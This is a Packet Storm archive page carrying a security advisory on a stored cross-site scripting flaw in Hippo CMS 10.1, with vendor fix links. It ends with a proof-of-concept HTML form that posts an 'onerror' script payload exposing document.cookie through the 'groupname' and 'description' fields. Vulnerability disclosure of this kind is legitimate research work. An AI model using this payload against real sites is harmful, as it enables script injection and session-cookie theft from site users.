exploit the possibilities

Hippo CMS 10.1 Stored Cross Site Scripting

Hippo CMS 10.1 Stored Cross Site Scripting
Posted Jan 31, 2016
Authored by LiquidWorm | Site zeroscience.mk

Hippo CMS version 10.1 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
MD5 | 8df9af3196961100ce97c2c63f88f8b3

Hippo CMS 10.1 Stored Cross Site Scripting

Change Mirror Download
<!--

Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability


Vendor: Hippo B.V.
Product web page: http://www.onehippo.org
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)

Summary: Hippo CMS is an open source Java CMS. We
built it so you can easily integrate it into your
existing architecture.

Desc: Hippo CMS suffers from a stored XSS vulnerability.
Input passed thru the POST parameters 'groupname' and
'description' is not sanitized allowing the attacker to
execute HTML code into user's browser session on the
affected site.


Tested on: Linux 2.6.32-5-xen-amd64
Java/1.8.0_66
Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5300
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php

Vendor: http://www.onehippo.org/security-issues-list/security-12.html
http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html


04.12.2015

-->


<html>
<body>
<form action="https://10.0.2.17/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-6-panel-panel-form-create~button" method="POST">
<input type="hidden" name="id26c_hf_0" value="" />
<input type="hidden" name="groupname" value="<img src=ko onerror=confirm(document.cookie)>" />
<input type="hidden" name="description" value="<img src=ko onerror=confirm(2)>" />
<input type="hidden" name="create-button" value="1" />
<input type="submit" value="Inject code" />
</form>
</body>
</html>
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close